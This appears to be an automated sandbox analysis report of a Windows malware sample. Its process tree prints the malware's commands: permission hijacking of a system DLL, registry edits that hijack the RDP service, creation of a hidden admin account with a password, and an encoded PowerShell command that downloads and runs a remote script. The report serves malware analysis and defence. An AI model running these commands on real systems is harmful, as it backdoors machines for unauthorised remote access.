Analysis
-
max time kernel
128s -
max time network
116s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
09-11-2020 20:56
General
-
Target
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe
-
Size
3.4MB
-
MD5
442016bf1c6123cc40ff23c3637396c0
-
SHA1
cea8d515186cf94bdaa4f78bbf6f5b9db9125c9a
-
SHA256
22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a
-
SHA512
d95bc9ee83436c7967dbe59e6c5625737053adb074b45972a7855f03d3770d87edde332a8cf4aa02529330178be99005a7b0912e6929d284c685433694199727
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Windows directory 41 IoCs
-
Modifies data under HKEY_USERS 60 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of WriteProcessMemory 127 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"C:\Users\Admin\AppData\Local\Temp\22d15118aebbacd7e69a0dec6c29978bdd5a6ba24d9dbfbe055f0620e37d3c4a.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES313E.tmp" "c:\Users\Admin\AppData\Local\Temp\grbppf0q\CSCA2FC6678DAEE47CDA4BB873730E22194.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin ibcLpLqB /add1⤵
-
C:\Windows\system32\net.exenet.exe user updwin ibcLpLqB /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin ibcLpLqB /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin ibcLpLqB1⤵
-
C:\Windows\system32\net.exenet.exe user updwin ibcLpLqB2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin ibcLpLqB3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES313E.tmpMD5
7261a708ffd78e9400bf926ba35534c7
SHA1a60419a32f6cec0de56c38368b50c12bd16220c1
SHA256b566074992bb2400ef0b048eb1dd1ba059d9b9d8c7eecc20f4c3deddb270c109
SHA512200059a6122f7076057846046ec29523c605dce58eaa3b85817d9f034ec0f2762ad8ca8764fa80b5de8abbabf1334e76dcec3ffb0176bb2637a2a59e6b563fd2
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.dllMD5
0c490ce7a6b73184b0b5278f5aacaf2c
SHA1893c5880833f6a4885dba15d51e909f95f340e71
SHA256615dc4c71aba291d2ced322a4d555deff513ac9b741eb6b66fd8851b47b74e63
SHA512a5b7d691e0f5bf512b6a0d6f9cc1069165bc70f5c088d09be54105e62df94ce39b589cda02cbef0cbee9e64322ede5076d2a6f5eafb757ad072091ba3769199d
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\CSCA2FC6678DAEE47CDA4BB873730E22194.TMPMD5
93287916571b71592295cb7840532dc5
SHA1b37054cf6ed6020c3e2ca74d7757b533f0e6f4e5
SHA256c39d3257eb57ef618753aa7d8119b0bb7b3bd786e080124c13878c0708f9ae56
SHA512cf199e14ea79734b31f02f6b29be7c304a6cc67dbfd9b2fdb0f8ff66d8c9a8ebfb3e677b5394c87107ca0018921ca9560c78f5e9781cedafacf543eeced47e31
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\grbppf0q\grbppf0q.cmdlineMD5
8f50ff5ccaa6bfc250371e26fcd4fc92
SHA19b9eb412509f63b1d6448dafe15f6297ad55095a
SHA2563aae583b0baf4a5afd0eff5915df89def228a9a845da6e5f901132a2e42941c1
SHA512ecd24e3c9b79ef2dfcf8bafe9be746af3d6374df409c7cd98bb6bdd746bfc0aa06eba7ccebe3ff8e3cd72e1089bbad9f00e62566186a19c777bbb4e91817aa2e
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/292-76-0x0000000000000000-mapping.dmp
-
memory/300-10-0x0000000000000000-mapping.dmp
-
memory/392-67-0x0000000000000000-mapping.dmp
-
memory/460-66-0x0000000000000000-mapping.dmp
-
memory/476-46-0x0000000000000000-mapping.dmp
-
memory/540-53-0x0000000000000000-mapping.dmp
-
memory/672-39-0x0000000000000000-mapping.dmp
-
memory/812-57-0x0000000000000000-mapping.dmp
-
memory/880-88-0x0000000000000000-mapping.dmp
-
memory/880-48-0x0000000000000000-mapping.dmp
-
memory/916-72-0x0000000000000000-mapping.dmp
-
memory/916-40-0x0000000000000000-mapping.dmp
-
memory/980-80-0x0000000000000000-mapping.dmp
-
memory/980-49-0x0000000000000000-mapping.dmp
-
memory/1000-56-0x0000000000000000-mapping.dmp
-
memory/1052-100-0x0000000001320000-0x0000000001321000-memory.dmpFilesize
4KB
-
memory/1052-109-0x0000000019F20000-0x0000000019F21000-memory.dmpFilesize
4KB
-
memory/1052-82-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmpFilesize
9.9MB
-
memory/1052-101-0x00000000193D0000-0x00000000193D1000-memory.dmpFilesize
4KB
-
memory/1052-108-0x00000000193C0000-0x00000000193C1000-memory.dmpFilesize
4KB
-
memory/1052-98-0x0000000001290000-0x0000000001291000-memory.dmpFilesize
4KB
-
memory/1052-97-0x0000000000BF0000-0x0000000000BF1000-memory.dmpFilesize
4KB
-
memory/1052-99-0x00000000193B0000-0x00000000193B1000-memory.dmpFilesize
4KB
-
memory/1052-116-0x00000000194A0000-0x00000000194A1000-memory.dmpFilesize
4KB
-
memory/1052-64-0x0000000000000000-mapping.dmp
-
memory/1052-92-0x0000000000F80000-0x0000000000F81000-memory.dmpFilesize
4KB
-
memory/1052-81-0x0000000000000000-mapping.dmp
-
memory/1052-117-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/1164-63-0x0000000000000000-mapping.dmp
-
memory/1224-79-0x0000000000000000-mapping.dmp
-
memory/1236-33-0x0000000001F70000-0x0000000001F71000-memory.dmpFilesize
4KB
-
memory/1236-17-0x00000000023D0000-0x00000000023D1000-memory.dmpFilesize
4KB
-
memory/1236-2-0x0000000000000000-mapping.dmp
-
memory/1236-3-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmpFilesize
9.9MB
-
memory/1236-4-0x0000000001FB0000-0x0000000001FB1000-memory.dmpFilesize
4KB
-
memory/1236-5-0x000000001ADA0000-0x000000001ADA1000-memory.dmpFilesize
4KB
-
memory/1236-6-0x00000000024F0000-0x00000000024F1000-memory.dmpFilesize
4KB
-
memory/1236-7-0x0000000001D40000-0x0000000001D41000-memory.dmpFilesize
4KB
-
memory/1236-9-0x000000001C3C0000-0x000000001C3C1000-memory.dmpFilesize
4KB
-
memory/1236-18-0x0000000002760000-0x0000000002761000-memory.dmpFilesize
4KB
-
memory/1236-21-0x000000001AB00000-0x000000001AB01000-memory.dmpFilesize
4KB
-
memory/1236-34-0x0000000001F80000-0x0000000001F81000-memory.dmpFilesize
4KB
-
memory/1236-35-0x000000001B8D0000-0x000000001B8D1000-memory.dmpFilesize
4KB
-
memory/1236-38-0x0000000001F40000-0x0000000001F50000-memory.dmpFilesize
64KB
-
memory/1336-45-0x0000000000000000-mapping.dmp
-
memory/1376-47-0x0000000000000000-mapping.dmp
-
memory/1440-55-0x0000000000000000-mapping.dmp
-
memory/1444-54-0x0000000000000000-mapping.dmp
-
memory/1540-70-0x0000000000000000-mapping.dmp
-
memory/1572-58-0x0000000000000000-mapping.dmp
-
memory/1596-44-0x0000000000000000-mapping.dmp
-
memory/1600-43-0x0000000000000000-mapping.dmp
-
memory/1600-75-0x0000000000000000-mapping.dmp
-
memory/1604-61-0x0000000000000000-mapping.dmp
-
memory/1620-73-0x0000000000000000-mapping.dmp
-
memory/1636-52-0x0000000000000000-mapping.dmp
-
memory/1664-42-0x0000000000000000-mapping.dmp
-
memory/1684-41-0x0000000000000000-mapping.dmp
-
memory/1692-13-0x0000000000000000-mapping.dmp
-
memory/1692-50-0x0000000000000000-mapping.dmp
-
memory/1700-0-0x00000000010F0000-0x000000000142D000-memory.dmpFilesize
3.2MB
-
memory/1700-1-0x0000000001430000-0x0000000001441000-memory.dmpFilesize
68KB
-
memory/1724-62-0x0000000000000000-mapping.dmp
-
memory/1912-51-0x0000000000000000-mapping.dmp
-
memory/1912-69-0x0000000000000000-mapping.dmp
-
memory/1952-78-0x0000000000000000-mapping.dmp
-
memory/1952-87-0x0000000000000000-mapping.dmp
-
memory/2028-36-0x0000000000000000-mapping.dmp
